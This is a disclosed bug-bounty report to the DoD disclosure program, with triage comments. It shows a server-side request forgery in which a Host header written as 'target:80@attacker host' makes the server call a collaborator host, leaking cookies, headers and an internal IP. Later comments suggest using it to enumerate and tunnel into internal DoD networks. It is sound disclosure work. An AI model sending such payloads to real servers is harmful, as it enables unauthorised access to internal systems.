alyssa_herrera submitted a report to U.S. Dept Of Defense.

Jan 29th (2 years ago)

Summary:
A server side request forgery vulnerability appears to leak an internal IP address and tries to connect to an attacker controlled host.
Description:
In an normal request on this web page
GET /HTTP/1.1
Host: www.████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG; googtrans=/en/zh-TW
Connection: close
Upgrade-Insecure-Requests: 1
It will connect to the website as expected but if we use a @ on the host header like this

GET / HTTP/1.1

Host: www.█████████:80@██████████.burpcollaborator.net

Pragma: no-cache

Cache-Control: no-cache, no-transform

Connection: close

It'll attempt to connect to our website and leak various information.
On our server we would see this,

GET / HTTP/1.1

Host: ████████.burpcollaborator.net

Pragma: no-cache

Cache-Control: no-cache, no-transform

Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG

X--------------: 1.1.1.1

Accept-Encoding: gzip, deflate, identity

Connection: Keep-Alive

Authorization: Basic d3d3LnZpLm5nYi5hcm15Lm1pbDo4MA==

X-BlueCoat-Via: 913daace1d652c00

Additionally we will see a DNS look up from this IP, 214.72.0.2 Which I confirmed to be DOD owned

Impact

Medium

Step-by-step Reproduction Instructions

We can reproduce this simply using www.████:80@yourhostname.com for the host header and we'll the see the results. As seen below

GET / HTTP/1.1

Host: www.████:80@yourwebsite.com

Pragma: no-cache

Cache-Control: no-cache, no-transform

Connection: close

If you have burp suite pro, you can do this easily with burp collaborator

Product, Version, and Configuration (If applicable)

N/a

Suggested Mitigation/Remediation Actions

Refuse attempts to connect to other hosts.

Impact

This will allow attackers to gain access to an internal IP of a DOD website along with other sensitive information that may be leaked with the request

 
 
BOT: U.S. Dept Of Defense posted a comment.

Jan 29th (2 years ago)

Greetings from the Department of Defense (DoD),

Thank you for supporting the DoD Vulnerability Disclosure Program (VDP).

By submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.

The VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.

We will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.

Our goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.

Regards,

The VDP Team

 
 
aboateng changed the status to Needs more info.

Updated Feb 7th (2 years ago)

Greetings @alyssa_herrera,

To validate the reported vulnerability, we require additional information.

Can you please answer the following questions?

Which information do you deem sensitive? Also please provide screenshot(s) or screen recording to illustrate the issue so we can clearly understand the issue you are reporting.

I will continue processing your report on receipt of your response. You will receive another status update upon completion of this review. If I have any other questions in the interim, I will be back in touch.

If we do not receive a response within two weeks, we will send you a second request for this information. If we do not receive a response from you within two weeks of the second notice, we will have to close this report without action.

If you have any questions, please let me know.

Thanks again for supporting the DoD Vulnerability Disclosure Program.

Regards,

 
 
 

alyssa_herrera changed the status to New.

Updated Oct 11th (2 months ago)

This is quite similar to #277450 and with the same issue.

Whois for both ip's
Source: whois.arin.net
IP Address: ██████
Name: ███
Handle: ███████
Registration Date: █████
Range: ████
Org: ████████
Org Handle: ███
Address: ██████
City: ████████
State/Province: ████
Postal Code: █████
Country: United States
Name Servers:

Source: whois.arin.net
IP Address: █████
Name: ███
Handle: ███
Registration Date: █████
Range: ████
Org: Headquarters, █████████
Org Handle: ████████
Address: ████
City: ███
State/Province: ███████
Postal Code: █████
Country: United States
Name Servers:

 
 
 
aboateng updated the severity to Low.

Feb 7th (2 years ago)

 
 
aboateng changed the status to Triaged.

Feb 7th (2 years ago)

Greetings,

We have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.

Thank you for bringing this vulnerability to our attention!

We will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.

You will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.

Thanks again for supporting the DoD Vulnerability Disclosure Program.

Regards,

The VDP Team

 
 
 

alyssa_herrera posted a comment.

Updated Oct 11th (2 months ago)

Hello, i'd like to give a bit of an update on this exploit. I figured out we can perform blind SSRF using this exploit.
If we use an https enabled website, We can trigger an SSL error which leads me to believe this website has the necessary capability to connect to other military websites either through the intranet or through clearnet. If we can query known military DNS it'll time out confirming it exists. I can do this with any DoD IP thus an attacker can enumerate the DoD internal infrastructure. I hope this is enough to bump the severity up a bit. Additionally We can use an IP I was able to pull from another report of mine to prove this theory,
If we use www.██████████:80@████████

We can use this to tunnel into internal networks and access intranet servers which I assume is accessible to NIPERNET if my understanding of the DoD intranet is correct

 
 
 
ag3nt-dc3 updated the severity from Low to Medium.

Mar 16th (2 years ago)

 
 
ag3nt-z3 closed the report and changed the status to Resolved.

Oct 24th (about 1 year ago)

Good news!

The vulnerability you reported has been resolved and this report is now closed. If you have any further questions or disagree that the report is resolved, please let us know.

Thank you for your time and effort to improve the security of the DoD information network.

Regards,

The VDP Team

 
 
 
alyssa_herrera requested to disclose this report.

Sep 12th (3 months ago)

 
 
agent-1 agreed to disclose this report.

Dec 3rd (2 days ago)

Approved for disclosure. Thanks for your participation in the DoD Vulnerability Disclosure Program (VDP). Please follow us on Twitter @DC3VDP

hackone ssrf的更多相关文章

  1. SSRF篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞.一般情况下,SSRF攻击的目标是从外网无法访问的内部系统.( ...

  2. SSRF安全威胁在JAVA代码中的应用

    如上图所示代码,在进行外部url调用的时候,引入了SSRF检测:ssrfChecker.checkUrlWithoutConnection(url)机制. SSRF安全威胁:   很多web应用都提供 ...

  3. web安全之ssrf

    ssrf(服务器端请求伪造)原理: 攻击者构造形成由服务端发起请求的一个漏洞.把服务端当作跳板来攻击其他服务,SSRF的攻击目标一般是外网无法访问到的内网 当服务端提供了从其他服务器获取数据的功能(如 ...

  4. SSRF攻击实例解析

    ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能.使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等.这个功能如果被恶意使用,可以利用存在缺陷的web应用作为 ...

  5. WebLogic SSRF 漏洞 (简要翻译)

    [Ref]http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cv ...

  6. SSRF漏洞学习

    SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞.一般情况下,SSRF攻击的目标是从外网无法访问的内 ...

  7. SSRF漏洞总结

    SSRF漏洞:(服务端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞.一般情况下,SSRF攻击的目标是从外网无法访问的内部系统.(正是因为它是由服务端发起的,所以它能够请求到与它相连而 ...

  8. 浅谈SSRF漏洞

    SSRF漏洞是如何产生的? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞.一般情况下,SSRF是要目标网站 ...

  9. Discuz!另一处SSRF无须登陆无须条件

    漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151179.html 看看poc:http://phpstudy.com/Discuz_ ...

随机推荐

  1. C# 9.0 新特性预览 - 类型推导的 new

    C# 9.0 新特性预览 - 类型推导的 new 前言 随着 .NET 5 发布日期的日益临近,其对应的 C# 新版本已确定为 C# 9.0,其中新增加的特性(或语法糖)也已基本锁定,本系列文章将向大 ...

  2. Java IO流(二)

    目录 字节缓冲流 概述 BufferedOutputStream类 继承父类的共性成员方法 构造方法 BufferedInputStream类 继承自父类的方法: 构造方法 文件复制练习(增强版 使用 ...

  3. etcd环境安装与使用

    etcd简介 etcd是开源的.高可用的分布式key-value存储系统,可用于配置共享和服务的注册和发现,它专注于: 简单:定义清晰.面向用户的API(gRPC) 安全:可选的客户端TLS证书自动认 ...

  4. rsync服务端一键安装rsync脚本(非源码)

    export RSYNC_PASSWORD=123 USER=rsync AUTHUSERS=bck MK=backupmk local_dir=/backup yum remove rsync &a ...

  5. Viterbi-Algorithm(维特比)算法

    CSDN博客:皮乾东  知乎:Htrying  微博:Htring的微博  微信公众号:自然语言处理爱好者(ID:NLP_lover)  文章来自:<数学之美> Viterbi-Algor ...

  6. 阿里面试居然跟我扯了半小时的CyclicBarrier

    一个大腹便便,穿着格子衬衫的中年男子,拿着一个贴满Logo的Mac向我走来,看着稀少的头发,我心想着肯定是顶级技术大牛吧!但是我也是一个才华横溢的人,稳住我们能赢. 面试官:您好,先做一下自我介绍吧! ...

  7. jQuery学习笔记——jQuery基础核心

    代码风格 在jQuery程序中,不管是页面元素的选择.内置的功能函数,都是美元符号“$”来起始的.而这个“$”就是jQuery当中最重要且独有的对象:jQuery对象,所以我们在页面元素选择或执行功能 ...

  8. 我参与 Seata 开源项目的一些感悟

    丁老师在他的知识星球邀请我回答以下一个问题: 我觉得这个问题非常有意思,姑且把它贴到公众号这里,与大家分享一下我对这个问题的一些感悟. 感谢丁老师的邀请问答: 在这里我就简单说下,我这段时间参与 Se ...

  9. jenkins 流水线学习

    最佳实践: https://www.cnblogs.com/itech/p/5678643.html 一些样例 https://jenkins.io/doc/pipeline/examples/ gi ...

  10. Appium自动化(7) - 控件定位工具之Appium 的 Inspector

    如果你还想从头学起Appium,可以看看这个系列的文章哦! https://www.cnblogs.com/poloyy/category/1693896.html 前言 上一篇文章介绍了另一块控件定 ...